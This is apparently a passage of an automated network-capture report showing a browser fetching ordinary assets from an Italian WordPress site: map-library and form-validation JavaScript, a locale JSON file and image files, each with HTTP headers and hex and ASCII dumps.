                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 6e 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 72 65 61 6d 2e 70 6f 69 6e 74 28 69 5b 30 5d 2c 69 5b 31 5d 29 7d 7d 29 7d 28 6e 29 28 53 28 61 28 4d 28 6c 3d 74 29 29 29 29 29 7d 2c 77 2e 70 72 65 63 6c 69 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 53 3d 74 2c 50 3d 76 6f 69 64 20 30 2c 4f 28 29 29 3a 53 7d 2c 77 2e 70 6f 73 74 63 6c 69 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 4d 3d 74 2c 5f 3d 69 3d 72 3d 6f 3d 6e 75 6c 6c 2c 4f 28 29 29 3a 4d 7d 2c 77 2e 63 6c 69 70 41 6e 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 53 3d 2b
                                                                                                                                          Data Ascii: n);return this.stream.point(i[0],i[1])}})}(n)(S(a(M(l=t)))))},w.preclip=function(t){return arguments.length?(S=t,P=void 0,O()):S},w.postclip=function(t){return arguments.length?(M=t,_=i=r=o=null,O()):M},w.clipAngle=function(t){return arguments.length?(S=+
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 69 28 79 72 29 2e 73 63 61 6c 65 28 32 35 30 29 2e 63 6c 69 70 41 6e 67 6c 65 28 31 34 32 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 50 72 28 74 2c 65 29 7b 72 65 74 75 72 6e 5b 44 28 56 28 28 4d 2b 65 29 2f 32 29 29 2c 2d 74 5d 7d 50 72 2e 69 6e 76 65 72 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 5b 2d 65 2c 32 2a 45 28 47 28 74 29 29 2d 4d 5d 7d 3b 76 61 72 20 53 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 69 28 50 72 29 2c 65 3d 74 2e 63 65 6e 74 65 72 2c 6e 3d 74 2e 72 6f 74 61 74 65 3b 72 65 74 75 72 6e 20 74 2e 63 65 6e 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 65 28 5b 2d 74 5b
                                                                                                                                          Data Ascii: r=function(){return Di(yr).scale(250).clipAngle(142)};function Pr(t,e){return[D(V((M+e)/2)),-t]}Pr.invert=function(t,e){return[-e,2*E(G(t))-M]};var Sr=function(){var t=Ui(Pr),e=t.center,n=t.rotate;return t.center=function(t){return arguments.length?e([-t[
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 6f 70 65 72 74 79 56 61 6c 75 65 28 22 6c 61 74 69 74 75 64 65 22 2c 74 2c 21 31 2c 21 30 29 2c 74 68 69 73 2e 75 70 64 61 74 65 45 78 74 72 65 6d 65 73 28 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 6f 6e 67 69 74 75 64 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 6c 6f 6e 67 69 74 75 64 65 22 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 73 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 6c 6f 6e 67 69 74 75 64 65 22 2c 74 2c 21 31 2c 21 30 29 2c 74 68 69 73
                                                                                                                                          Data Ascii: opertyValue("latitude",t,!1,!0),this.updateExtremes()},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype,"longitude",{get:function(){return this.getPropertyValue("longitude")},set:function(t){this.setPropertyValue("longitude",t,!1,!0),this
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 69 64 3d 3d 75 7d 29 3b 63 3f 63 2e 6d 75 6c 74 69 50 6f 6c 79 67 6f 6e 7c 7c 28 63 2e 6d 75 6c 74 69 50 6f 6c 79 67 6f 6e 3d 73 29 3a 28 63 3d 7b 6d 75 6c 74 69 50 6f 6c 79 67 6f 6e 3a 73 2c 69 64 3a 75 2c 6d 61 64 65 46 72 6f 6d 47 65 6f 44 61 74 61 3a 21 30 7d 2c 72 2e 64 61 74 61 2e 70 75 73 68 28 63 29 29 2c 42 72 2e 73 6f 66 74 43 6f 70 79 50 72 6f 70 65 72 74 69 65 73 28 69 2e 70 72 6f 70 65 72 74 69 65 73 2c 63 29 7d 7d 7d 2c 72 3d 74 68 69 73 2c 6f 3d 30 2c 61 3d 6e 2e 6c 65 6e 67 74 68 3b 6f 3c 61 3b 6f 2b 2b 29 69 28 6f 29 7d 7d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 69 64 61 74 65 44 61 74 61 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 76
                                                                                                                                          Data Ascii: function(t,e){return t.id==u});c?c.multiPolygon||(c.multiPolygon=s):(c={multiPolygon:s,id:u,madeFromGeoData:!0},r.data.push(c)),Br.softCopyProperties(i.properties,c)}}},r=this,o=0,a=n.length;o<a;o++)i(o)}}t.prototype.validateData.call(this)},e.prototype.v
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 74 75 72 6e 20 74 3b 76 61 72 20 75 2c 73 2c 6c 2c 68 7d 66 75 6e 63 74 69 6f 6e 20 65 6f 28 74 29 7b 72 65 74 75 72 6e 28 74 25 3d 33 36 30 29 3e 31 38 30 26 26 28 74 2d 3d 33 36 30 29 2c 74 3c 2d 31 38 30 26 26 28 74 2b 3d 33 36 30 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 6f 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 74 2e 6c 6f 6e 67 69 74 75 64 65 2c 79 3a 74 2e 6c 61 74 69 74 75 64 65 7d 7d 76 61 72 20 69 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 72 65 74 75 72 6e 20 65 2e 61 64 6a 75 73 74 52 6f 74 61 74 69 6f 6e 3d 21 30 2c 65 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 4d 61 70 4c 69 6e 65 4f 62 6a 65 63 74 22 2c 65 2e 69 73 4d 65 61 73 75 72 65
                                                                                                                                          Data Ascii: turn t;var u,s,l,h}function eo(t){return(t%=360)>180&&(t-=360),t<-180&&(t+=360),t}function no(t){return{x:t.longitude,y:t.latitude}}var io=function(t){function e(){var e=t.call(this)||this;return e.adjustRotation=!0,e.className="MapLineObject",e.isMeasure
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 6f 6e 28 29 7b 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 73 68 6f 72 74 65 73 74 44 69 73 74 61 6e 63 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 73 68 6f 72 74 65 73 74 44 69 73 74 61 6e 63 65 22 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 73 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 73 68 6f 72 74 65 73 74 44 69 73 74 61 6e 63 65 22 2c 74 2c 21 30 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                          Data Ascii: on(){},Object.defineProperty(e.prototype,"shortestDistance",{get:function(){return this.getPropertyValue("shortestDistance")},set:function(t){this.setPropertyValue("shortestDistance",t,!0)},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          55192.168.2.4498125.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:59 UTC589OUTGET /wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=1732789977147 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:59 UTC302INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 06 Oct 2021 08:44:17 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 1139
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:32:59 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/json
                                                                                                                                          2024-11-28 10:32:59 UTC1139INData Raw: 7b 0a 20 20 22 43 4f 55 4e 54 52 59 22 3a 20 7b 0a 20 20 20 20 22 54 49 54 4c 45 22 3a 20 22 4e 61 7a 69 6f 6e 65 22 2c 0a 20 20 20 20 22 41 54 22 3a 20 22 41 75 73 74 72 69 61 22 2c 0a 20 20 20 20 22 42 45 22 3a 20 22 42 65 6c 67 69 75 6d 22 2c 0a 20 20 20 20 22 42 47 22 3a 20 22 42 75 6c 67 61 72 69 61 22 2c 0a 20 20 20 20 22 43 41 22 3a 20 22 43 61 6e 61 64 61 22 2c 0a 20 20 20 20 22 43 4e 22 3a 20 22 43 68 69 6e 61 22 2c 0a 20 20 20 20 22 43 59 22 3a 20 22 43 79 70 72 75 73 22 2c 0a 20 20 20 20 22 44 45 22 3a 20 22 47 65 72 6d 61 6e 79 22 2c 0a 20 20 20 20 22 47 52 22 3a 20 22 47 72 65 65 63 65 22 2c 0a 20 20 20 20 22 49 4e 22 3a 20 22 49 6e 64 69 61 22 2c 0a 20 20 20 20 22 49 4c 22 3a 20 22 49 73 72 61 65 6c 22 2c 0a 20 20 20 20 22 49 54 22 3a 20 22
                                                                                                                                          Data Ascii: { "COUNTRY": { "TITLE": "Nazione", "AT": "Austria", "BE": "Belgium", "BG": "Bulgaria", "CA": "Canada", "CN": "China", "CY": "Cyprus", "DE": "Germany", "GR": "Greece", "IN": "India", "IL": "Israel", "IT": "


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          56192.168.2.4498145.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:59 UTC640OUTGET /wp-content/uploads/sites/71/2017/02/AGRI_logo_white.png HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:59 UTC279INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 7011
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:59 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/png
                                                                                                                                          2024-11-28 10:32:59 UTC7011INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 6f 08 04 00 00 00 fc cf 35 88 00 00 1b 2a 49 44 41 54 78 da ed 9d 77 60 15 c5 d6 c0 cf 4d a1 97 d0 91 de a4 49 47 41 aa 01 14 11 51 43 07 a9 2a 45 aa 01 69 2a 25 06 42 2f a1 87 6a 28 52 45 a2 4f 9a 20 86 26 3e 0b 22 88 a2 a2 f2 2c 4f 9f dd f7 f4 e3 f9 2c bf ef 8f 9d dd 9d bd 25 dc 84 80 82 33 e7 9f 7b 77 67 b6 cc fc 76 f6 cc 99 33 67 05 31 62 24 fb c5 54 81 11 03 96 11 03 96 11 03 96 11 23 06 2c 23 06 2c 23 06 2c 23 46 0c 58 46 0c 58 46 0c 58 46 8c 18 b0 8c 18 b0 8c 18 b0 8c 18 31 60 19 31 60 19 31 60 19 31 62 c0 32 62 c0 32 62 c0 32 62 c4 80 65 c4 80 65 c4 80 65 c4 48 36 80 95 f5 44 23 96 32 83 71 3c 4e 32 d3 a9 1a 22 57 05 7a d1 9e 38 7a 93 43 b2 21 d1 83 e5 44 d1 92 7c ea 7f 1a 7a aa
                                                                                                                                          Data Ascii: PNGIHDR,o5*IDATxw`MIGAQC*Ei*%B/j(REO &>",O,%3{wgv3g1b$T#,#,#,#FXFXFXF1`1`1`1b2b2b2beeeH6D#2q<N2"Wz8zC!D|z


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          57192.168.2.4498165.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:59 UTC593OUTGET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:59 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 31 May 2023 06:59:20 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 10241
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:59 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:32:59 UTC7876INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 73 29 3d 3e 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 73 29 74 2e 6f 28 73 2c 69 29 26 26 21 74 2e 6f 28 65 2c 69 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 69 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 73 5b 69 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 53
                                                                                                                                          Data Ascii: (()=>{"use strict";var t={d:(e,s)=>{for(var i in s)t.o(s,i)&&!t.o(e,i)&&Object.defineProperty(e,i,{enumerable:!0,get:s[i]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,S
                                                                                                                                          2024-11-28 10:32:59 UTC2365INData Raw: 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 61 70 70 6c 65 2e 6b 65 79 6e 6f 74 65 22 29 2c 74 2e 73 65 74 28 22 6e 75 6d 62 65 72 73 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 61 70 70 6c 65 2e 6e 75 6d 62 65 72 73 22 29 2c 74 2e 73 65 74 28 22 70 61 67 65 73 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 61 70 70 6c 65 2e 70 61 67 65 73 22 29 2c 74 7d 29 28 29 29 28 22 2a 22 3d 3d 3d 69 26 26 6e 2e 73 74 61 72 74 73 57 69 74 68 28 74 2b 22 2f 22 29 7c 7c 6e 3d 3d 3d 73 5b 30 5d 29 26 26 65 2e 70 75 73 68 28 2e 2e 2e 6f 2e 73 70 6c 69 74 28 22 7c 22 29 29 7d 72 65 74 75 72 6e 20 65 7d 29 28 65 29 2e 73 6f 6d 65 28 28 65 3d 3e 28 65 3d 22 2e 22 2b 65 2e 74 72 69 6d 28 29 2c 74 2e 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29
                                                                                                                                          Data Ascii: plication/vnd.apple.keynote"),t.set("numbers","application/vnd.apple.numbers"),t.set("pages","application/vnd.apple.pages"),t})())("*"===i&&n.startsWith(t+"/")||n===s[0])&&e.push(...o.split("|"))}return e})(e).some((e=>(e="."+e.trim(),t.name.toLowerCase()


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          58192.168.2.4498175.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:59 UTC405OUTGET /wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:59 UTC282INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 209711
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:59 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          2024-11-28 10:32:59 UTC7910INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 02 4b 06 40 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 ff c4 00 1b 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f4 27 5f 12
                                                                                                                                          Data Ascii: JFIFCCK@'_
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 0d e3 4a 44 ca 6a 56 c5 95 85 75 21 da d5 97 dd 22 a5 6c 66 5a eb a6 52 32 e1 77 da 8a ef aa 4f 3d 86 72 d2 c7 ac f6 ed bf 6e 1d 13 d7 e2 e8 3e 8f 0b fa c5 5b 2d 92 65 0a b1 40 1b 86 88 76 3a 5c 5a f2 3d 2b 81 93 26 a3 6b 20 5a 88 af ef c0 dc b8 a7 93 e8 71 4f 83 fa 9e 9b bf 3e ff 00 d1 e5 9b 73 27 7c db b6 24 d6 47 8f b2 be 28 ba f9 f9 c6 3a f4 4a e9 9a c2 b3 a7 04 c6 73 87 6a 92 a3 3d 73 3d 37 e7 6f a9 f0 d5 df ca be fc 3b 97 a3 87 5e b3 0d cf 7e 76 f3 7a b6 1c 3d 1c 3b c9 ee e5 5e af 04 4d f9 c8 7e eb bd fa 31 ea 3f 47 9e cb 5c fb 67 9f a9 f9 7d 6f e2 ce e9 ce 8f f4 3f 88 4d 91 f6 87 ae 71 b5 98 77 28 5c 3f c1 fd 5b fe 5e fd d1 db 49 74 68 d8 50 2d 31 48 62 8a ac eb 05 c3 79 2f 44 ca 7a 3a c8 e5 d3 61 e7 e5 77 e7 d0 0e 08 4d 20 7a c9 1a cb 94 60 05 10
                                                                                                                                          Data Ascii: JDjVu!"lfZR2wO=rn>[-e@v:\Z=+&k ZqO>s'|$G(:Jsj=s=7o;^~vz=;^M~1?G\g}o?Mqw(\?[^IthP-1Hby/Dz:awM z`
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: e0 0a 1c 95 c8 5c ae 0a 54 24 2d 66 26 a9 8b 40 05 4d 39 98 63 17 4f c0 08 af d6 61 89 14 3c 4a 1c 86 ab 31 d3 15 bb 97 78 3c 39 34 f4 af 66 95 35 23 54 e5 93 73 55 2c 61 34 c5 ce 77 79 78 b2 9a b6 e7 a8 b7 2c d8 9a 9b 9d 36 53 6f 27 4d 80 b0 c9 70 b5 44 2e 68 ac 42 14 72 9f 5f 9a ab db c6 17 5f 3e 6f a6 79 e4 ef 91 5e b7 e7 d7 a4 be 6f ba 76 35 36 5b 9c d7 13 9a 76 e7 a5 ce a5 c4 99 72 dd 33 26 5b 18 9b 14 bd 32 d9 7d cf 72 d1 bb 14 4d 95 78 bc 9b 96 94 bc 6a fa fa 57 ab 9f 8b 3c 9d 7c ed cf 8e ab b7 0c c7 3e cd cb bc ea fa b1 df c3 61 f5 3f 3a b9 4d 5e c4 c4 7a fc 8e 67 66 79 63 ea 7c 3d 0e be 75 7b ab b5 64 f3 e3 f7 e9 d1 6b e6 65 39 fd 7b cd 78 28 67 ba cb 5e 6b 9d 78 f4 79 77 2f 89 fb 97 26 99 9a cb 7c 1f d6 8c e8 d4 d2 8e f9 7c 7b f3 3e 5d 0f 5e ba
                                                                                                                                          Data Ascii: \T$-f&@M9cOa<J1x<94f5#TsU,a4wyx,6So'MpD.hBr__>oy^ov56[vr3&[2}rMxjW<|>a?:M^zgfyc|=u{dke9{x(g^kxyw/&||{>]^
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 74 93 24 c8 9d 9a f8 f9 22 57 51 cc e8 d5 03 16 31 a8 84 40 90 a0 c1 52 e6 de 87 20 c1 0f 4a 90 aa ba 96 86 4a 1a 80 80 4d 62 3b 66 54 9e 56 fd 67 cd f3 57 df f1 7a 23 e0 fb fd d5 f8 df a7 0b 50 46 6b 73 37 bc e8 71 ab 08 97 0f cb 77 9b 2f 35 ec d6 b5 10 12 28 48 63 85 56 e4 0a 93 1c f7 a6 2b 2c b9 94 c8 56 42 23 58 c2 a4 91 13 c9 72 c9 68 8a ab 9a 4a ea 9c b6 f2 47 23 d3 44 6b 09 5b 19 15 4e e6 de f2 de c3 3b b2 ce 8a 13 49 42 14 84 a9 12 8a 0c 4c ac ac 05 cf b7 c7 b7 d7 90 7b bc 17 7b f3 c0 5c 2f 4e 38 2e de 77 ef 6f 74 f8 3d 3d 4b 86 9d 46 75 1d 96 5e 29 19 bf 67 87 1b f4 7e 1b 77 0a 55 cd 2a 00 00 22 c4 dc 95 12 15 84 c8 00 40 59 9f 27 f4 87 e2 fa 29 82 52 84 aa 44 a2 55 07 5b df 39 b2 e7 77 ca ff 00 1d 4b 50 90 80 12 72 59 9e 37 8a 58 e9 98 e9 e7 3d
                                                                                                                                          Data Ascii: t$"WQ1@R JJMb;fTVgWz#PFks7qw/5(HcV+,VB#XrhJG#Dk[N;IBL{{\/N8.wot==KFu^)g~wU*"@Y')RDU[9wKPrY7X=
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: e6 70 a5 5b 32 41 a3 c1 46 be 9c e6 c8 e1 e5 15 4e e4 f4 5e c9 2b 6a 31 6a 50 45 4e 16 6a 3a 9c b2 69 77 b5 9c 3f ab e9 ff 00 f9 28 a7 72 77 2d 2f ee 87 60 5b 7d a7 37 2a 48 37 27 d3 05 3b 4d 6a 1a 70 09 b4 f0 8d 64 6b 95 d0 2b a2 e5 d3 72 d8 f5 b5 c8 07 21 9e d2 9f ca aa 67 79 53 fc 59 fc b2 b7 2d cb 7a de ba 8b a8 ba 81 07 85 b5 61 61 63 fb 05 ca bd 1b 96 95 7e 1f 0a bd 3a d5 47 3c 21 e1 67 0e f6 0a b0 7a 16 25 8a 3b 50 c8 c9 2a 4e d7 e4 67 93 be 03 8a ca 29 e9 de 54 0f 21 31 c0 f2 72 28 ac ac ab 55 77 a7 82 c5 1c 02 67 d2 d3 0c ae 8c c5 13 1f 2b 53 26 6a ea b5 75 1a b7 85 b8 2d c1 7c a6 c5 22 e8 3d 36 ba 0c 6b 7b 70 8f 22 8e 7b ad 37 2d 0e ca d7 68 fa fa 35 5e ab 3d 35 de 3a 9e 77 27 15 6e c8 6a 7b 9e 1d b4 86 d9 db 8a ad ca ac ff 00 bb a8 30 e3 92 02
                                                                                                                                          Data Ascii: p[2AFN^+j1jPENj:iw?(rw-/`[}7*H7';Mjpdk+r!gySY-zaac~:G<!gz%;P*Ng)T!1r(Uwg+S&ju-|"=6k{p"{7-h5^=5:w'nj{0
